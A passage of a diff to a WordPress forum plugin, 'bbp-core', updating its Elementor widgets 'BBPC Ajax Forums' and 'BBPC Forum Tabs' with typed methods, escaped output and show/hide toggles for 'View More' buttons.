-				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time',
-			]
-		);
-
-		//parent forum
-		$this->add_control(
-			'parent_forum',
-			[
-				'label' => esc_html__( 'Parent Forum', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-		$this->add_control(
-			'parent_forum_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .post-content .post-category a' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_control(
-			'parent_forum_color_hover',
-			[
-				'label'     => esc_html__( 'Hover color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .post-content .post-category a:hover' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'parent_forum_typo',
-				'selector' => '{{WRAPPER}} .post-content .post-category a',
-			]
-		);
-
-		$this->end_controls_section();
-	}
-
-	protected function render() {
-		$settings 		= $this->get_settings();
-		$filter_btns 	= $settings['filter_btns'] ?? true;
-
-		$topics = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
-			'order'          => $settings['order'] ? $settings['order'] : 'DESC',
-		) );
-		?>
-
-        <div class="forum-post-widget" data_id="<?php echo esc_attr( $this->get_id() ); ?>">
-
-			<?php
-			if ( $filter_btns == true ) :
-				?>
-				<div class="post-filter-widget mb-20 wow fadeInUp">
-					<div class="single-filter-item">
-						<a href="#" id="all_filt" data-forum="all" class="data-active">
-							<i class="icon_grid-2x2"></i><?php _e( 'All', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="populer_filt" data-forum="popular">
-							<i class="icon_easel"></i><?php _e( 'Popular', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="featured_filt" data-forum="featured">
-							<i class="icon_ribbon_alt"></i><?php _e( 'Featured', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="recent_filt" data-forum="recent">
-							<i class="icon_clock_alt"></i><?php _e( 'Recent', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="unsolved_filt" data-forum="unsolved">
-							<i class="icon_close_alt2"></i><?php _e( 'Unsolved', 'bbp-core' ) ?>
-						</a>
-					</div>
-					<div class="single-filter-item">
-						<a href="#" id="solved_filt" data-forum="solved">
-							<i class="icon_check_alt2"></i><?php _e( 'Solved', 'bbp-core' ) ?>
-						</a>
-					</div>
-				</div>
-				<?php
-			endif;
-			?>
-
-            <div id="aj-post-filter-widget">
-				<?php
-				$delay = 0.0;
-				$i     = 0;
-				while ( $topics->have_posts() ) : $topics->the_post();
-					$item_id    = get_the_ID();
-					$author_id  = get_post_field( 'post_author', $item_id );
-					$topic_id   = $topics->posts[ $i ]->ID;
-					$vote_count = get_post_meta( $topic_id, "bbpv-votes", true );
-					$forum_id   = bbp_get_topic_forum_id();
-					?>
-                    <div class="single-forum-post-widget wow fadeInUp" data-wow-delay="<?php echo $delay ?>s">
-                        <div class="post-content">
-                            <div class="post-title">
-                                <h6><a href="<?php the_permalink(); ?>"> <?php the_title() ?> </a></h6>
-                            </div>
-                            <div class="post-info">
-                                <div class="author">
-                                    <img src="<?php echo BBPC_IMG ?>/forum_tab/user-circle-alt.svg" alt="<?php esc_attr_e( 'User circle alt icon', 'bbpc-core' ); ?>">
-									<?php
-									echo bbp_get_topic_author_link(
-										array(
-											'post_id' 	=> $topic_id,
-											'type' 		=> 'name'
-										)
-									);
-									?>
-                                </div>
-
-                                <div class="post-time">
-                                    <img src="<?php echo BBPC_IMG ?>/forum_tab/time-outline.svg" alt="<?php esc_attr_e( 'Time outline icon', 'bbpc-core' ); ?>">
-									<?php echo bbp_forum_last_active_time( get_the_ID() ); ?>
-                                </div>
-                            </div>
-
-                            <div class="post-category">
-                                <a href="<?php echo get_the_permalink( $forum_id ) ?>">
-									<?php echo get_the_post_thumbnail( $forum_id ); ?>
-									<?php echo bbp_get_topic_forum_title(); ?>
-                                </a>
-                            </div>
-                        </div>
-                        <div class="post-reach">
-                            <div class="post-view">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/eye-outline.svg" alt="<?php esc_attr_e( 'Eye outline icon', 'bbpc-core' ); ?>">
-
-								<?php
-								bbp_topic_view_count( $topic_id );
-								echo ' ';
-								_e( 'Views', 'bbp-core' );
-								?>
-                            </div>
-                            <div class="post-like">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/thumbs-up-outline.svg" alt="<?php esc_attr_e( 'Thumbs-up outline icon', 'bbpc-core' ); ?>">
-
-								<?php
-								if ( $vote_count ) {
-									echo $vote_count;
-								} else {
-									echo "0";
-								}
-
-								echo ' ';
-								_e( 'Likes', 'bbp-core' );
-								?>
-                            </div>
-                            <div class="post-comment">
-                                <img src="<?php echo BBPC_IMG ?>/forum_tab/chatbubbles-outline.svg" alt="<?php esc_attr_e( 'Chat bubbles icon', 'bbpc-core' ); ?>">
-
-								<?php
-								bbp_topic_reply_count( $topic_id );
-								echo ' ';
-								_e( 'Replies', 'bbp-core' );
-								?>
-                            </div>
-                        </div>
-                    </div>
-
-					<?php
-					$delay += 0.2;
-					if ( $delay > 0.6 ) {
-						$delay = 0.0;
-					}
-					$i ++;
-				endwhile;
-				unset( $delay );
-				unset( $i );
-				wp_reset_postdata();
-				?>
-            </div>
-        </div>
-		<?php
-	}
+<?php
+
+namespace adminElementor;
+
+use ElementorControls_Manager;
+use ElementorWidget_Base;
+use WP_Query;
+
+// Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+class Forum_Ajax extends Widget_Base {
+	public function get_name(): string
+    {
+		return 'ama_ajax_forum';
+	}
+
+	public function get_title(): string
+    {
+		return esc_html__( 'BBPC Ajax Forums', 'bbp-core' );
+	}
+
+	public function get_icon(): string
+    {
+		return 'bbpc_icon_ama_ajax_forum';
+	}
+
+	public function get_keywords(): array
+    {
+		return [ 'forum', 'ajax' ];
+	}
+
+	public function get_categories(): array
+    {
+		return [ 'bbp-core' ];
+	}
+
+	public function get_style_depends(): array
+    {
+		return [ 'bbpc-el-widgets' ];
+	}
+
+	public function get_script_depends(): array
+    {
+		return [ 'bbpc-ajax' ];
+	}
+
+	protected function register_controls(): void
+    {
+		//========================== Filter Options =====================//
+		$this->start_controls_section(
+			'filter_sec', [
+				'label' => esc_html__( 'Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'ppp2', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::NUMBER,
+				'default'     => 9
+			]
+		);
+
+		$this->add_control(
+			'order', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => ElementorControls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+		// button show hide switcher
+		$this->add_control(
+			'filter_btns',
+			[
+				'label'        => esc_html__( 'Tab Filter', 'bbp-core' ),
+				'type'         => ElementorControls_Manager::SWITCHER,
+				'label_on'     => esc_html__( 'Show', 'bbp-core' ),
+				'label_off'    => esc_html__( 'Hide', 'bbp-core' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+			]
+		);
+
+		$this->end_controls_section();
+
+		/**
+		 * Styling section starts
+		 */
+		$this->start_controls_section(
+			'styling_sec', [
+				'label' => esc_html__( 'Title Style', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+		//forum title
+		$this->add_control(
+			'forum_heading',
+			[
+				'label' => esc_html__( 'Forum Title', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+
+		$this->add_control(
+			'forum_title_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-title a' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_control(
+			'forum_title_hover_color',
+			[
+				'label'     => esc_html__( 'Hover Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-title a:hover' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_title_typography',
+				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-title a',
+			]
+		);
+
+		// Forum meta
+		$this->add_control(
+			'forum_meta',
+			[
+				'label' => esc_html__( 'Forum Meta', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+		$this->add_control(
+			'forum_meta_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_meta_typography',
+				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time',
+			]
+		);
+
+		//parent forum
+		$this->add_control(
+			'parent_forum',
+			[
+				'label' => esc_html__( 'Parent Forum', 'bbp-core' ),
+				'type' => ElementorControls_Manager::HEADING,
+				'separator' => 'before',
+			]
+		);
+
+		$this->add_control(
+			'parent_forum_color',
+			[
+				'label'     => esc_html__( 'Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .post-content .post-category a' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_control(
+			'parent_forum_color_hover',
+			[
+				'label'     => esc_html__( 'Hover color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .post-content .post-category a:hover' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'parent_forum_typo',
+				'selector' => '{{WRAPPER}} .post-content .post-category a',
+			]
+		);
+
+		$this->end_controls_section();
+	}
+
+	protected function render() {
+		$settings 		= $this->get_settings();
+		$filter_btns 	= $settings['filter_btns'] ?? true;
+
+		$topics = new WP_Query( array(
+			'post_type'      => 'topic',
+			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
+			'order'          => $settings['order'] ? $settings['order'] : 'DESC',
+		) );
+		?>
+
+        <div class="forum-post-widget" data_id="<?php echo esc_attr( $this->get_id() ); ?>">
+
+			<?php
+			if ($filter_btns) :
+				?>
+				<div class="post-filter-widget mb-20 wow fadeInUp">
+					<div class="single-filter-item">
+						<a href="#" id="all_filt" data-forum="all" class="data-active">
+							<i class="icon_grid-2x2"></i><?php esc_html_e( 'All', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="populer_filt" data-forum="popular">
+							<i class="icon_easel"></i><?php esc_html_e( 'Popular', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="featured_filt" data-forum="featured">
+							<i class="icon_ribbon_alt"></i><?php esc_html_e( 'Featured', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="recent_filt" data-forum="recent">
+							<i class="icon_clock_alt"></i><?php esc_html_e( 'Recent', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="unsolved_filt" data-forum="unsolved">
+							<i class="icon_close_alt2"></i><?php esc_html_e( 'Unsolved', 'bbp-core' ) ?>
+						</a>
+					</div>
+					<div class="single-filter-item">
+						<a href="#" id="solved_filt" data-forum="solved">
+							<i class="icon_check_alt2"></i><?php esc_html_e( 'Solved', 'bbp-core' ) ?>
+						</a>
+					</div>
+				</div>
+				<?php
+			endif;
+			?>
+
+            <div id="aj-post-filter-widget">
+				<?php
+				$delay = 0.0;
+				$i     = 0;
+				while ( $topics->have_posts() ) : $topics->the_post();
+					$topic_id   = $topics->posts[ $i ]->ID;
+					$vote_count = get_post_meta( $topic_id, "bbpv-votes", true );
+					$forum_id   = bbp_get_topic_forum_id();
+					?>
+                    <div class="single-forum-post-widget wow fadeInUp" data-wow-delay="<?php echo $delay ?>s">
+                        <div class="post-content">
+                            <div class="post-title">
+                                <h6><a href="<?php the_permalink(); ?>"> <?php the_title() ?> </a></h6>
+                            </div>
+                            <div class="post-info">
+                                <div class="author">
+                                    <img src="<?php echo BBPC_IMG . '/forum_tab/user-circle-alt.svg' ?>" alt="<?php esc_attr_e( 'User circle alt icon',
+                                        'bbpc-core' ); ?>">
+									<?php
+									echo bbp_get_topic_author_link(
+										array(
+											'post_id' 	=> $topic_id,
+											'type' 		=> 'name'
+										)
+									);
+									?>
+                                </div>
+
+                                <div class="post-time">
+                                    <img src="<?php echo BBPC_IMG . '/forum_tab/time-outline.svg' ?>" alt="<?php esc_attr_e( 'Time outline icon', 'bbpc-core' ); ?>">
+									<?php bbp_forum_last_active_time( get_the_ID() ); ?>
+                                </div>
+                            </div>
+
+                            <div class="post-category">
+                                <a href="<?php echo get_the_permalink( $forum_id ) ?>">
+									<?php echo get_the_post_thumbnail( $forum_id ); ?>
+									<?php echo bbp_get_topic_forum_title(); ?>
+                                </a>
+                            </div>
+                        </div>
+                        <div class="post-reach">
+                            <div class="post-view">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/eye-outline.svg' ?>" alt="<?php esc_attr_e( 'Eye outline icon', 'bbpc-core' ); ?>">
+
+								<?php
+								bbp_topic_view_count( $topic_id );
+								echo ' ';
+								esc_html_e( 'Views', 'bbp-core' );
+								?>
+                            </div>
+                            <div class="post-like">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/thumbs-up-outline.svg' ?>" alt="<?php esc_attr_e( 'Thumbs-up outline icon', 'bbpc-core' ); ?>">
+
+								<?php
+								if ( $vote_count ) {
+									echo $vote_count;
+								} else {
+									echo "0";
+								}
+
+								echo ' ';
+								esc_html_e( 'Likes', 'bbp-core' );
+								?>
+                            </div>
+                            <div class="post-comment">
+                                <img src="<?php echo BBPC_IMG . '/forum_tab/chatbubbles-outline.svg' ?>" alt="<?php esc_attr_e( 'Chat bubbles icon', 'bbpc-core' ); ?>">
+								<?php
+								bbp_topic_reply_count( $topic_id );
+								echo ' ';
+								esc_html_e( 'Replies', 'bbp-core' );
+								?>
+                            </div>
+                        </div>
+                    </div>
+					<?php
+					$delay += 0.2;
+					if ( $delay > 0.6 ) {
+						$delay = 0.0;
+					}
+					$i ++;
+				endwhile;
+				unset( $delay );
+				unset( $i );
+				wp_reset_postdata();
+				?>
+            </div>
+        </div>
+		<?php
+	}
 }
 No newline at end of file
--- a/bbp-core/includes/Elementor/Forum_Tab.php
+++ b/bbp-core/includes/Elementor/Forum_Tab.php
@@ -1,245 +1,299 @@
-<?php
-namespace adminElementor;
-
-use ElementorControls_Manager;
-use ElementorWidget_Base;
-use WP_Query;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-class Forum_Tab extends Widget_Base {
-	public function get_name() {
-		return 'ama_forum_tab';
-	}
-
-	public function get_title() {
-		return esc_html__( 'BBPC Forum Tabs', 'bbp-core' );
-	}
-
-	public function get_icon() {
-		return 'bbpc_icon_ama_forum_tab';
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	public function get_style_depends() {
-		return['bbpc-el-widgets'];
-	}
-
-	// scripts dependencies
-	public function get_script_depends() {
-		return [ 'bbpc_js' ];
-	}
-
-
-	protected function register_controls() {
-		// --- Forum Filter Options
-		$this->start_controls_section(
-			'forum_filter', [
-				'label' => __( 'Forum Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'forum_tab_title',
-			[
-				'label'       => __( 'Forum Tab Title', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::TEXT,
-				'default'     => __( 'Show Forums', 'bbp-core' ),
-				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'default'     => 9
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->add_control(
-			'more_txt', [
-				'label'       => esc_html__( 'More button text', 'bbp-core' ),
-				'type'        => Controls_Manager::TEXT,
-				'label_block' => true,
-				'separator'   => 'before',
-				'default'     => 'Show more'
-			]
-		);
-
-		$this->add_control(
-			'more_url',
-			[
-				'label'       => esc_html__( 'More button link', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::URL,
-				'placeholder' => __( 'https://your-link.com', 'bbp-core' ),
-				'default'     => [
-					'url'         => get_post_type_archive_link( 'forum' ),
-					'is_external' => true,
-					'nofollow'    => true,
-				],
-			]
-		);
-
-
-		$this->end_controls_section();
-
-		//-------- Topic Filter Options
-		$this->start_controls_section(
-			'topic_filter', [
-				'label' => __( 'Topic Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'topics_tab_title',
-			[
-				'label'       => __( 'Topics Tab Title', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::TEXT,
-				'default'     => __( 'Show Topics', 'bbp-core' ),
-				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp2', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'label_block' => true,
-				'default'     => 6
-			]
-		);
-
-		$this->add_control(
-			'order2', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->add_control(
-			'more_txt2', [
-				'label'       => esc_html__( 'More button text', 'bbp-core' ),
-				'type'        => Controls_Manager::TEXT,
-				'label_block' => true,
-				'default'     => 'Show more'
-			]
-		);
-
-		$this->add_control(
-			'more_url2', [
-				'label'       => esc_html__( 'More button link', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::URL,
-				'placeholder' => __( 'https://your-link.com', 'bbp-core' ),
-				'default'     => [
-					'url'         => get_post_type_archive_link( 'topic' ),
-					'is_external' => true,
-					'nofollow'    => true,
-				],
-			]
-		);
-
-		$this->end_controls_section();
-
-		$this->start_controls_section(
-			'forum_tab_style', [
-				'label' => __( 'Forum Tab Title', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_tab_title',
-				'label'    => __( 'Tab Label Typography', 'bbp-core' ),
-				'selector' => '{{WRAPPER}} .community-area .nav-tabs .nav-item button',
-			]
-		);
-
-		$this->add_control(
-			'forum_tab_title_color',
-			[
-				'label'     => __( 'Tab Label Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .community-area .nav-tabs .nav-item button' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->end_controls_section();
-
-		$this->start_controls_section(
-			'forum_tab_button', [
-				'label' => esc_html__( 'Forum Tab Button', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-
-		$this->add_responsive_control(
-			'tab_btn_margin', [
-				'label'      => esc_html__( 'Margin', 'bbp-core' ),
-				'type'       => Controls_Manager::DIMENSIONS,
-				'size_units' => [ 'px', '%', 'em' ],
-				'selectors'  => [
-					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
-				],
-			]
-		);
-
-		$this->add_responsive_control(
-			'tab_btn_padding', [
-				'label'      => esc_html__( 'Tab button padding', 'bbp-core' ),
-				'type'       => Controls_Manager::DIMENSIONS,
-				'size_units' => [ 'px', '%', 'em' ],
-				'selectors'  => [
-					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
-				],
-			]
-		);
-
-		$this->end_controls_section();
-	}
-
-	protected function render() {
-		$settings = $this->get_settings();
-
-		$forums = new WP_Query( array(
-			'post_type'      => 'forum',
-			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : 9,
-			'order'          => $settings['order'],
-		) );
-
-		$topics = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
-			'order'          => $settings['order'],
-		) );
-
-		include( "inc/forum/forum_tab.php" );
-	}
+<?php
+namespace adminElementor;
+
+use ElementorControls_Manager;
+use ElementorWidget_Base;
+use WP_Query;
+
+// Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+class Forum_Tab extends Widget_Base {
+	public function get_name() {
+		return 'ama_forum_tab';
+	}
+
+	public function get_title() {
+		return esc_html__( 'BBPC Forum Tabs', 'bbp-core' );
+	}
+
+	public function get_icon() {
+		return 'bbpc_icon_ama_forum_tab';
+	}
+
+	public function get_categories() {
+		return [ 'bbp-core' ];
+	}
+
+	public function get_style_depends() {
+		return['bbpc-el-widgets'];
+	}
+
+	// scripts dependencies
+	public function get_script_depends() {
+		return [ 'bbpc_js' ];
+	}
+
+
+	protected function register_controls(): void
+    {
+
+
+		//======================= Forum Filter Options ==================
+		$this->start_controls_section(
+			'forum_filter', [
+				'label' => __( 'Forum Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'forum_tab_title', [
+				'label'       => __( 'Forum Tab Title', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::TEXT,
+				'default'     => __( 'Show Forums', 'bbp-core' ),
+				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'ppp', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'default'     => 9
+			]
+		);
+
+		$this->add_control(
+			'order', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => Controls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+        //==== View More Button
+        $this->add_control(
+            'more_txt_heading', [
+                'label'       => esc_html__( 'View More Button', 'bbp-core' ),
+                'type'        => Controls_Manager::HEADING,
+                'separator'   => 'before',
+            ]
+        );
+
+        $this->add_control(
+            'is_forum_tab_btn', [
+                'label' => esc_html__( 'Button (Show/Hide)', 'bbp-core' ),
+                'type' => ElementorControls_Manager::SWITCHER,
+                'label_on' => esc_html__( 'Show', 'bbp-core' ),
+                'label_off' => esc_html__( 'Hide', 'bbp-core' ),
+                'return_value' => 'yes',
+                'default' => 'yes',
+            ]
+        );
+
+		$this->add_control(
+			'more_txt', [
+				'label'       => esc_html__( 'Button Label', 'bbp-core' ),
+				'type'        => Controls_Manager::TEXT,
+				'label_block' => true,
+				'default'     => esc_html__('View More', 'bbp-core'),
+                'condition'   => [
+                    'is_forum_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->add_control(
+			'more_url', [
+				'label'       => esc_html__( 'Button URL', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::URL,
+				'default'     => [
+					'url'         => get_post_type_archive_link( 'forum' ),
+					'is_external' => true,
+					'nofollow'    => true,
+				],
+                'condition'   => [
+                    'is_forum_tab_btn' => 'yes'
+                ]
+			]
+		); //End View More Button
+
+		$this->end_controls_section(); // End Forum Filter Options
+
+
+		//======================== Topic Filter Options =========================//
+		$this->start_controls_section(
+			'topic_filter', [
+				'label' => __( 'Topic Filter Options', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'topics_tab_title', [
+				'label'       => __( 'Topics Tab Title', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::TEXT,
+				'default'     => __( 'Show Topics', 'bbp-core' ),
+				'placeholder' => __( 'Enter the tab title', 'bbp-core' ),
+			]
+		);
+
+		$this->add_control(
+			'ppp2', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'label_block' => true,
+				'default'     => 6
+			]
+		);
+
+		$this->add_control(
+			'order2', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => Controls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+        //==== View More Button
+        $this->add_control(
+            'more_txt2_heading', [
+                'label'       => esc_html__( 'View More Button', 'bbp-core' ),
+                'type'        => Controls_Manager::HEADING,
+                'separator'   => 'before',
+            ]
+        );
+
+        $this->add_control(
+            'is_topic_tab_btn', [
+                'label' => esc_html__( 'Button (Show/Hide)', 'bbp-core' ),
+                'type' => ElementorControls_Manager::SWITCHER,
+                'label_on' => esc_html__( 'Show', 'bbp-core' ),
+                'label_off' => esc_html__( 'Hide', 'bbp-core' ),
+                'return_value' => 'yes',
+                'default' => 'yes',
+            ]
+        );
+
+
+		$this->add_control(
+			'more_txt2', [
+				'label'       => esc_html__( 'Button Label', 'bbp-core' ),
+				'type'        => Controls_Manager::TEXT,
+				'label_block' => true,
+				'default'     => esc_html__('View More', 'bbp-core'),
+                'condition'   => [
+                    'is_topic_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->add_control(
+			'more_url2', [
+				'label'       => esc_html__( 'Button URL', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::URL,
+				'default'     => [
+					'url'         => get_post_type_archive_link( 'topic' ),
+					'is_external' => true,
+					'nofollow'    => true,
+				],
+                'condition'   => [
+                    'is_topic_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->end_controls_section(); //End Topic Filter Options
+
+
+        //===================== Forum Tab Title ======================//
+		$this->start_controls_section(
+			'forum_tab_style', [
+				'label' => __( 'Forum Tab Title', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_tab_title',
+				'label'    => __( 'Tab Label Typography', 'bbp-core' ),
+				'selector' => '{{WRAPPER}} .community-area .nav-tabs .nav-item button',
+			]
+		);
+
+		$this->add_control(
+			'forum_tab_title_color',
+			[
+				'label'     => __( 'Tab Label Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .community-area .nav-tabs .nav-item button' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->end_controls_section();
+
+
+		$this->start_controls_section(
+			'forum_tab_button', [
+				'label' => esc_html__( 'Forum Tab Button', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+		$this->add_responsive_control(
+			'tab_btn_margin', [
+				'label'      => esc_html__( 'Margin', 'bbp-core' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => [ 'px', '%', 'em' ],
+				'selectors'  => [
+					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'tab_btn_padding', [
+				'label'      => esc_html__( 'Tab button padding', 'bbp-core' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => [ 'px', '%', 'em' ],
+				'selectors'  => [
+					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->end_controls_section();
+	}
+
+	protected function render() {
+		$settings = $this->get_settings();
+
+		$forums = new WP_Query( array(
+			'post_type'      => 'forum',
+			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : 9,
+			'order'          => $settings['order'],
+		) );
+
+		$topics = new WP_Query( array(
+			'post_type'      => 'topic',
